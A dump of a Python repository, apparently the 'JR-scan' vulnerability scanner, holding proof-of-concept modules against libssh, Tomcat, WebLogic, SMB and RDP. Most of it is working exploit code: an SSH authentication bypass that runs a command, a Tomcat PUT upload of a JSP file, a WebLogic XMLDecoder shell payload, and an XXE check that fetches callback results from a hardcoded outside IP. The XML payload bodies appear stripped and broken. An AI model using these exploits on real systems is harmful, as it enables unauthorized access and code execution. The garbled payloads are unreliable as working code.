 8 | description: 漏洞源于未经过验证的session操纵SSH2_MSG_USERAUTH_SUCCESS导致的身份验证绕过。
 9 | '''
10 | import sys
11 | import socket
12 | import paramiko
13 | import warnings
14 | import tempfile,sys
15 | from termcolor import cprint
16 | from urllib.parse import urlparse
17 | 
18 | sys.stderr=tempfile.TemporaryFile()
19 | 
20 | class libssh_bypass_auth_BaseVerify:
21 |     def __init__(self, url):
22 |         self.url = url
23 | 
24 |     def run(self):
25 |         port = 22
26 |         if r"http" in self.url:
27 |             #提取host
28 |             host = urlparse(self.url)[1]
29 |             try:
30 |                 port = int(host.split(':')[1])
31 |             except:
32 |                 pass
33 |             flag = host.find(":")
34 |             if flag != -1:
35 |                 host = host[:flag]
36 |         else:
37 |             if self.url.find(":") >= 0:
38 |                 host = self.url.split(":")[0]
39 |                 port = int(self.url.split(":")[1])
40 |             else:
41 |                 host = self.url
42 | 
43 |         try:
44 |             sock = socket.socket()
45 |             sock.settimeout(6)
46 |             sock.connect((host, port))
47 |             message = paramiko.message.Message()
48 |             transport = paramiko.transport.Transport(sock)
49 |             transport.start_client()
50 |             message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
51 |             transport._send_message(message)
52 |             cprint("[*]发现"+host+":"+str(port)+" 版本:"+transport.remote_version, "green")
53 |             spawncmd = transport.open_session(timeout=6)
54 |             spawncmd.exec_command("whoami")
55 |             if spawncmd.recv_exit_status() == 0:
56 |                 cprint("[+]存在libssh身份绕过漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
57 |                 return True
58 |             else:
59 |                 cprint("[-]不存在libssh_bypass_auth漏洞", "white", "on_grey")
60 | 
61 |         except:
62 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
63 | 
64 | if __name__ == "__main__":
65 |     warnings.filterwarnings("ignore")
66 |     testVuln = libssh_bypass_auth_BaseVerify(sys.argv[1])
67 |     testVuln.run()
68 | 


--------------------------------------------------------------------------------
/POC_Scan/system/systemmain.py:
--------------------------------------------------------------------------------
 1 | #ssh漏洞
 2 | from POC_Scan.system.ssh.libssh_bypass_auth import libssh_bypass_auth_BaseVerify
 3 | 
 4 | #tomcat vulns
 5 | from POC_Scan.system.tomcat.tomcat_put_exec import tomcat_put_exec_BaseVerify
 6 | from POC_Scan.system.tomcat.tomcat_Ajp_lfi import tomcat_Ajp_lfi_BaseVerify
 7 | 
 8 | #nginx vulns
 9 | from POC_Scan.system.nginx.multi_fastcgi_code_exec import multi_fastcgi_code_exec_BaseVerify
10 | 
11 | #weblogic vulns
12 | from POC_Scan.system.weblogic.weblogic_ssrf import weblogic_ssrf_BaseVerify
13 | from POC_Scan.system.weblogic.weblogic_xmldecoder_exec import weblogic_xmldecoder_exec_BaseVerify
14 | from POC_Scan.system.weblogic.weblogic_interface_disclosure import weblogic_interface_disclosure_BaseVerify
15 | from POC_Scan.system.weblogic.weblogic_ws_utc_xxe import weblogic_ws_utc_xxe_BaseVerify
16 | 
17 | #php vulns
18 | from POC_Scan.system.php.php_expose_disclosure import php_expose_disclosure_BaseVerify
19 | from POC_Scan.system.php.php_fastcgi_read import php_fastcgi_read_BaseVerify
20 | 
21 | #iis vulns
22 | from POC_Scan.system.iis.iis_webdav_rce import iis_webdav_rce_BaseVerify
23 | 
24 | #windows
25 | from POC_Scan.system.windows.RDP_CodeExecution import rdp_code_execution_BaseVerify
26 | from POC_Scan.system.windows.smb_code_execution import smb_code_execution_BaseVerify
27 | 


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_Ajp_lfi.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_put_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/__pycache__/tomcat_weak_pass.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/tomcat/__pycache__/tomcat_weak_pass.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/tomcat/tomcat_put_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: Tomcat代码执行漏洞(CVE-2017-12616)
 5 | referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
 6 | author: Lucifer
 7 | description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
 8 | 影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
 9 | '''
10 | import sys
11 | import time
12 | import hashlib
13 | import requests
14 | import datetime
15 | import warnings
16 | from termcolor import cprint
17 | 
18 | class tomcat_put_exec_BaseVerify:
19 |     def __init__(self, url):
20 |         self.url = url
21 | 
22 |     def run(self):
23 |         headers = {
24 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
25 |         }
26 |         post_data = "thisisashell"
27 |         time_stamp = time.mktime(datetime.datetime.now().timetuple())
28 |         m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
29 |         md5_str = m.hexdigest()
30 |         vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
31 |         try:
32 |             req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
33 |             if req.status_code == 201:
34 |                 cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
35 |                 return True
36 |             else:
37 |                 cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
38 | 
39 |         except:
40 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
41 | 
42 |         time_stamp = time.mktime(datetime.datetime.now().timetuple())
43 |         m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
44 |         md5_str = m.hexdigest()
45 |         vulnurl = self.url + "/" + md5_str +".jsp/"
46 |         try:
47 |             req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
48 |             if req.status_code == 201:
49 |                 cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
50 |                 return True
51 |             else:
52 |                 cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
53 | 
54 |         except:
55 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
56 | 
57 | if __name__ == "__main__":
58 |     warnings.filterwarnings("ignore")
59 |     testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
60 |     testVuln.run()
61 | 


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_interface_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ssrf.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_weak_pass.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_weak_pass.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_ws_utc_xxe.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/weblogic/__pycache__/weblogic_xmldecoder_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_interface_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic 接口泄露
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: weblogic 接口泄露
 8 | '''
 9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 | 
14 | class weblogic_interface_disclosure_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |         "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/bea_wls_deployment_internal/DeploymentService"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
26 | 
27 |             if req.status_code == 200:
28 |                 cprint("[+]存在weblogic 接口泄露漏洞...(信息)\tpayload: "+vulnurl, "green")
29 |                 return True
30 |             else:
31 |                 cprint("[-]不存在weblogic_interface_disclosure漏洞", "white", "on_grey")
32 | 
33 |         except:
34 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = weblogic_interface_disclosure_BaseVerify(sys.argv[1])
39 |     testVuln.run()
40 | 


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_ssrf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic SSRF漏洞(CVE-2014-4210)
 5 | referer: http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
 6 | author: Lucifer
 7 | description: weblogic 版本10.0.2 -- 10.3.6中SearchPublicRegistries.jsp,参数operator可传入内网IP造成SSRF漏洞
 8 | '''
 9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 | 
14 | class weblogic_ssrf_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |         "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | 
27 |             if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
28 |                 cprint("[+]存在weblogic SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
29 |                 return True
30 |             else:
31 |                 cprint("[-]不存在weblogic_ssrf漏洞", "white", "on_grey")
32 | 
33 |         except:
34 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = weblogic_ssrf_BaseVerify(sys.argv[1])
39 |     testVuln.run()
40 | 


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_ws_utc_xxe.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic blind XXE漏洞(CVE-2018-3246)
 5 | referer: http://www.freebuf.com/vuls/186862.html
 6 | author: Lucifer
 7 | description: blind XXE。
 8 | '''
 9 | import sys
10 | import time
11 | import json
12 | import hashlib
13 | import datetime
14 | import warnings
15 | import requests
16 | from termcolor import cprint
17 | 
18 | class weblogic_ws_utc_xxe_BaseVerify:
19 |     def __init__(self, url):
20 |         self.url = url
21 | 
22 |     def run(self):
23 |         headers = {
24 |             "Content-Type":"multipart/form-data; boundary=----WebKitFormBoundaryUFcVz4AB2dQvWbyH",
25 |             "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
26 |             }
27 |         payload = "/ws_utc/resources/ws/config/import?timestamp=123123"
28 |         vulnurl = self.url + payload
29 |         time_stamp = time.mktime(datetime.datetime.now().timetuple())
30 |         m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
31 |         md5_str = m.hexdigest()
32 |         post_data = "------WebKitFormBoundaryUFcVz4AB2dQvWbyH\r\nContent-Disposition: form-data; name=\"import_file_name\"; filename=\"1.xml\"\r\nContent-Type: text/xml\r\n\r\n%remote;]>\n\r\n------WebKitFormBoundaryUFcVz4AB2dQvWbyH--\r\n"
33 |         try:
34 |             req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
35 |             eye_url = "http://45.76.158.91/web.log"
36 |             time.sleep(6)
37 |             reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
38 |             if md5_str in reqr.text:
39 |                 cprint("[+]存在weblogic blind XXE漏洞(CVE-2018-3246)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
40 |                 return True
41 |             else:
42 |                 cprint("[-]不存在weblogic_ws_utc_xxe漏洞", "white", "on_grey")
43 | 
44 |         except:
45 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
46 | 
47 | if __name__ == "__main__":
48 |     warnings.filterwarnings("ignore")
49 |     testVuln = weblogic_ws_utc_xxe_BaseVerify(sys.argv[1])
50 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/system/weblogic/weblogic_xmldecoder_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: weblogic XMLdecoder反序列化漏洞(CVE-2017-10271)
 5 | referer: https://www.anquanke.com/post/id/92003
 6 | author: Lucifer
 7 | description: weblogic /wls-wsat/CoordinatorPortType接口存在命令执行。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class weblogic_xmldecoder_exec_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "Content-Type":"text/xml;charset=UTF-8",
21 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 |         }
23 |         payload = "/wls-wsat/CoordinatorPortType"
24 |         post_data = '''
25 |          
26 |            
27 |               
28 |                
29 |                  
30 |                    
31 |                      
32 |                       /bin/sh 
33 |                       
34 |                      
35 |                       -c 
36 |                       
37 |                      
38 |                       whoami
39 |                      
40 |                     
41 |                    
42 |                  
43 |                
44 |              
45 |             
46 |            
47 |         
48 |         '''
49 |         vulnurl = self.url + payload
50 |         try:
51 |             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
52 |             if req.status_code == 500 and r"java.lang.ProcessBuilder" in req.text:
53 |                 cprint("[+]存在weblogic XMLdecoder反序列化漏洞...(高危)\tpayload: "+vulnurl, "red")
54 |                 return True
55 |             else:
56 |                 cprint("[-]不存在weblogic_xmldecoder_exec漏洞", "white", "on_grey")
57 | 
58 |         except:
59 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
60 | 
61 | if __name__ == "__main__":
62 |     warnings.filterwarnings("ignore")
63 |     testVuln = weblogic_xmldecoder_exec_BaseVerify(sys.argv[1])
64 |     testVuln.run()
65 | 


--------------------------------------------------------------------------------
/POC_Scan/system/windows/0708detector.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/0708detector.exe


--------------------------------------------------------------------------------
/POC_Scan/system/windows/RDP_CodeExecution.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import subprocess
 3 | from termcolor import cprint
 4 | 
 5 | class rdp_code_execution_BaseVerify():
 6 | 
 7 |     def __init__(self,url):
 8 |         current_abs_path = os.path.abspath(__file__)
 9 |         current_abs_path_dir = os.path.dirname(current_abs_path)
10 |         self.poc = os.path.abspath(current_abs_path_dir) + '/0708detector.exe'
11 |         self.url=url
12 | 
13 |     def run(self, port='3389'):
14 |         command = self.poc + ' -t ' + self.url + ' -p ' + port
15 |         result = subprocess.getoutput(command)
16 |         try:
17 |             if 'WARNING: SERVER IS VULNERABLE' in result:
18 |                 cprint("[+]存在RDP远程代码执行漏洞", "green")
19 |                 return True
20 |             else:
21 |                 cprint("[-]不存在RDP远程代码执行漏洞", "white", "on_grey")
22 |         except:
23 |             cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")
24 | 
25 | if __name__ == '__main__':
26 |     rdp=RDP_CodeExecution_BaseVerify('119.23.243.224')
27 |     rdp.run()
28 | 


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/smb_code_execution.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import struct
 3 | from termcolor import cprint
 4 | 
 5 | class smb_code_execution_BaseVerify():
 6 | 
 7 |     def __init__(self,url):
 8 |         self.pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
 9 |         self.url = url
10 | 
11 |     def run(self):
12 |         sock = socket.socket(socket.AF_INET)
13 |         sock.settimeout(3)
14 |         try:
15 |             sock.connect((str(self.url), 445 ))
16 | 
17 |             sock.send(self.pkt)
18 |             nb, = struct.unpack(">I", sock.recv(4))
19 |             res = sock.recv(nb)
20 |             if res[68:70] != b"\x11\x03" or res[70:72] != b"\x02\x00":
21 |                 cprint("[+]不存在SMB远程代码执行漏洞\t", "red")
22 |             else:
23 |                 cprint("[+]存在SMB远程代码执行漏洞\t", "red")
24 |                 return True
25 | 
26 |         except:
27 |             cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")
28 |             sock.close()
29 |             pass
30 | 
31 | if __name__ == '__main__':
32 |     smb=smb_code_execution_BaseVerify('127.0.0.1')
33 |     smb.run()


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # JR-scan
 2 | 利用python3写的综合扫描工具,可“一键”实现基本信息收集(端口、敏感目录、WAF、服务、操作系统),支持POC扫描(可自行添加POC,操作简单),支持利用AWVS探测,未来争取实现xray联动。  
 3 | 在启动扫描器后,傻瓜式操作即可完成扫描。  
 4 | 扫描器允许进行单个扫描,批量扫描(从文件列表里扫描网站),C段扫描  
 5 | 启动方法:直接利用Python3运行JR.py即可  
 6 | 提示:最好是在liux环境下运行,win的话,可能会出现编码问题!!!  
 7 | 
 8 | 启动界面  
 9 | 
10 | ![image](https://github.com/675354981/JR-scan/blob/master/images/%E5%90%AF%E5%8A%A8.png)    
11 | 
12 | 数据库界面  
13 | 
14 | ![image](https://github.com/675354981/JR-scan/blob/master/images/dbs.png)    
15 | 
16 | 网站整体界面  
17 | 
18 | ![image](https://github.com/675354981/JR-scan/blob/master/images/%E6%95%B4%E7%AB%99.png)    
19 | 
20 | 端口界面  
21 | 
22 | ![image](https://github.com/675354981/JR-scan/blob/master/images/port.png)    
23 | 
24 | URL界面  
25 | 
26 | ![image](https://github.com/675354981/JR-scan/blob/master/images/url.png)    
27 | 
28 | 漏洞界面  
29 | 
30 | ![image](https://github.com/675354981/JR-scan/blob/master/images/vuln.png)
31 | 


--------------------------------------------------------------------------------
/__pycache__/report.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/__pycache__/report.cpython-37.pyc


--------------------------------------------------------------------------------
/__pycache__/report.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/__pycache__/report.cpython-38.pyc


--------------------------------------------------------------------------------
/images/dbs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/dbs.png


--------------------------------------------------------------------------------
/images/image:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/images/port.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/port.png


--------------------------------------------------------------------------------
/images/url.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/url.png


--------------------------------------------------------------------------------
/images/vuln.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/vuln.png


--------------------------------------------------------------------------------
/images/启动.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/启动.png


--------------------------------------------------------------------------------
/images/子域名.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/子域名.png


--------------------------------------------------------------------------------
/images/整站.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/整站.png


--------------------------------------------------------------------------------
/lib/__pycache__/active.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/active.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/active.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/active.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/bcolors.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/bcolors.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/bcolors.cpython-38.pyc:
--------------------------------------------------------------------------------
